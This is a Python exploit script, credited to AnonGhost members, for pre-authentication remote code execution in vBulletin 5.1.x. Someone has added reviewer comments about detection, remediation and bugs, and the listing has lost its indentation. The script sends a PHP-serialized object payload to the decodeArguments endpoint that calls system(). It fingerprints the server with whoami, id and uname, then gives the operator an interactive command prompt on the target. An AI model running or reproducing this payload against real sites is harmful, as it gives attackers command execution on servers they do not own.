#Exploit Title: vBulletin 5.1.x - PreAuth Remote Code Execution
#Date: 11-10-2015
#Dork:Powered by: vBulletin, Version 5.1 or make your own ^^
#Requirements: Python 3.4.x or higher, install Requests and parse Module.
#Description: We are not the authors of this exploit; we just fixed the exploit and coded this script (Mauritania Attacker & Th3Falcon)
import requests, re, sys
import parse as urlparse #BUG Python Module Parse Fixed By Mauritania Attacker (urllib.parse does not work properly)
def banner():
    """Write the script's start-up banner to stdout, one print call per row."""
    rows = (
        '\n',
        '++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++',
        ' VBulletin 5.1.x RCE auto Exploiter Priv8 ',
        ' GreetZ To All AnonGhost Members ',
        ' Coded by Mauritania Attacker & Th3Falcon ',
        '++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++',
        '\n',
    )
    # Each row goes through print() separately, so the '\n' rows yield two
    # line breaks apiece (the literal newline plus print's own terminator).
    for row in rows:
        print(row)
# Vulnerability probe for the pre-auth flaw named in the header.
#   ghost   : base URL of the site, exactly as typed at the prompt in main().
#   returns : the fourth ':::'-separated field of the second response (the
#             output of `pwd`), or '' when the marker check fails or any
#             exception is raised.
# Reviewer notes (defensive reading of this block):
#   * No login, cookie or token is sent; both requests are plain GETs.
#   * The `arguments` query parameter carries a PHP-serialized object
#     (O:12:"vB_dB_Result") whose nested "functions" array maps
#     "free_result" to "system". The payload shape implies the endpoint
#     deserializes request data -- presumably the callback fires when the
#     result object is released; confirm against the vBulletin source.
#   * Detection: requests to /ajax/api/hook/decodeArguments whose `arguments`
#     value starts with a serialized object (`O:<n>:"`) are worth alerting on
#     in web-server and WAF logs.
#   * Remediation is server-side: apply the vendor's security patch for the
#     5.1.x branch (patch level not stated on this page) and do not
#     deserialize request parameters.
def inject( ghost ):
url = ghost + '/ajax/api/hook/decodeArguments?' #Added "?" after each decodeArguments variable By Mauritania Attacker
try:
# Stage 1: marker check. The embedded command only echoes a fixed string.
# timeout=50 is the requests timeout in seconds.
r = requests.get( url, params = 'arguments=O:12:"vB_dB_Result":2:{s:5:"*db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"*recordset";s:14:"echo Th3Falcon";}', timeout= 50 )
# The host is treated as affected only when the marker is present AND the
# body is shorter than 50 characters, i.e. the reply looks like raw command
# output rather than an HTML page that merely contains the string.
if 'Th3Falcon' in r.text and len( r.text ) < 50:
try:
# Stage 2: host fingerprint. Four commands run in one request, their outputs
# separated by the literal ':::' so the reply can be split client-side.
r = requests.get( url, params = 'arguments=O:12:"vB_dB_Result":2:{s:5:"*db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"*recordset";s:49:"whoami;echo :::;id;echo :::;uname -a;echo :::;pwd";}', timeout= 50 )
# NOTE(review): the labels below do not match the command order. Field 0 is
# the `whoami` output (printed as GROUP) and field 1 is the `id` output
# (printed as USER); fields 2 and 3 are `uname -a` and `pwd`.
print( ' [+] GROUP : ' + r.text.split( ':::' )[0].strip() )
print( ' [+] USER : ' + r.text.split( ':::' )[1].strip() )
print( ' [+] KERNEL : ' + r.text.split( ':::' )[2].strip() )
print( ' [+] DIR : ' + r.text.split( ':::' )[3].strip() )
sys.stdout.flush()
return r.text.split( ':::' )[3].strip();
# Bare except: any failure here (network error, fewer than four fields in the
# reply) is swallowed, and main() then reports the site as not vulnerable.
except:
return ''
else:
return ''
# Bare except around stage 1: every exception type is reduced to the same
# message and an empty return value.
except:
print(' [+] Problem while exploiting..')
return ''
# Sends one operator-typed command through the same serialized-object request
# that inject() uses, and prints the raw response body.
#   ghost   : base URL of the site.
#   command : text entered at the prompt in main(); it is concatenated into the
#             payload unchanged, prefixed with str(len(command)) as the
#             serialized string length.
#   returns : None (the response is only printed).
# Reviewer notes (defensive reading of this block):
#   * The payload travels in the URL query string of a GET request, so each
#     command typically appears (URL-encoded) in the web server's access log.
#     That makes post-incident reconstruction possible from the log entries
#     for /ajax/api/hook/decodeArguments.
#   * Unlike inject(), there is no try/except here: a requests error
#     propagates to the caller.
def bash(ghost, command):
url = ghost + '/ajax/api/hook/decodeArguments?' #Added "?" after each decodeArguments variable By Mauritania Attacker
r = requests.get( url, params = 'arguments=O:12:"vB_dB_Result":2:{s:5:"*db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"*recordset";s:' + str(len(command)) + ':"' + command + '";}', timeout= 50 )
print(r.text)
# Interactive driver: prints the banner, then repeatedly prompts for a base URL
# until the literal 'exit' is entered.
# For each URL it calls inject(); a non-empty return value (the `pwd` output)
# opens an inner prompt whose lines are passed to bash() until 'exit' is typed.
# An empty return value prints the "not Vulnerable" message and the outer
# prompt repeats.
# NOTE(review): the input is used as typed -- no URL scheme check or
# normalisation is visible in this function.
def main():
banner()
site = ''
while site != 'exit':
site = input('Target : ')
if site == 'exit':
break
# `mad` holds inject()'s return value; '' means the probe failed or errored.
mad = inject(site)
if mad != '' :
print(' [+] @Connection Successfully established... \n')
userinput = ''
while userinput != 'exit':
userinput = input("AnonGhost@Target :")
if userinput == 'exit':
break
bash(site, userinput)
else:
print(' [+] Website is not Vulnerable :(')
# Script entry guard: main() is called when the file is run directly.
# NOTE(review): indentation was lost in this listing, so the nesting of the
# call under the guard is inferred from the usual idiom.
if __name__ == '__main__':
main()
#D0ne
#./Mauritania Attacker
#./Th3Falcon
#GreetZ To All AnonGhost MemberZ